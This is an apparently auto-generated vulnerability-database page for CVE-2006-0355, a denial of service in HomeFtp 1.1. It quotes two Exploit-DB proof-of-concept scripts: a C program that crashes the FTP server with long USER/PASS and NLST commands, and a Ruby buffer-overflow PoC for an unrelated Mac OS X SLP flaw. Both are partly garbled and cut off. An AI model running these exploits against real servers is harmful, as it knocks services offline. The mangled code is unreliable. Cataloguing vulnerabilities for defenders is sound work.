CVE-2006-0355
published 2006-01-22CVE-2006-0355: Helmsman Research (aka CoolUtils) HomeFtp 1.1 allows remote attackers to cause an unspecified denial of service via a long USER command combined with a long…
PriorityP419medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.06%
86.0th percentile
Helmsman Research (aka CoolUtils) HomeFtp 1.1 allows remote attackers to cause an unspecified denial of service via a long USER command combined with a long PASS command and an NLST command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| helmsman_research | homeftp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)
exploitdb·2007-01-18
CVE-2007-0355 Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)
Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)
---
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok
# Kevin Finisterre
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.
require 'socket'
target_path = (ARGV[0] || '/var/run/slp_ipc')
slp_socket = UNIXSocket.open(target_path)
payload = ("\x58" * 506)
payload
"\xff\x03\x00\x00" + # length of attr-list string 0x3ff = 1023 in hex.
(payload) #
slp_socket.write stream
slp_socket.close
# milw0rm.com [2007-01-18]
Exploit-DB
HomeFtp 1.1 - 'NLST' Denial of Service
exploitdb·2006-01-14
CVE-2006-0355 HomeFtp 1.1 - 'NLST' Denial of Service
HomeFtp 1.1 - 'NLST' Denial of Service
---
/*
HomeFtp v1.1 Denial of Service
original advisory: http://kapda.ir/advisory-202.html
homeftp_v1.1_xpl.c
*/
#include
#include
#include
#include
#include
#define POCSTR "USER %s\x0d\x0aPASS %s\x0d\x0aNLST\x0d\x0a"
int header();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );
int header() {
printf("\n[i] KAPDA - Computer Security Science Researchers Institute\n\n");
printf("[i] Title: \tHomeFTP h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[e] Socket failed!\n" );
exit(1);
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[e] Failed connecting!\n" );
exit(1);
}
return ( s );
}
int main(int argc, char *argv[]) {
int s;
char *r
No writeups or analysis indexed.
http://securityreason.com/securityalert/350http://www.kapda.ir/advisory-202.htmlhttp://www.securityfocus.com/archive/1/421869/100/0/threadedhttp://www.securityfocus.com/bid/16238https://exchange.xforce.ibmcloud.com/vulnerabilities/24152http://securityreason.com/securityalert/350http://www.kapda.ir/advisory-202.htmlhttp://www.securityfocus.com/archive/1/421869/100/0/threadedhttp://www.securityfocus.com/bid/16238https://exchange.xforce.ibmcloud.com/vulnerabilities/24152
2006-01-22
Published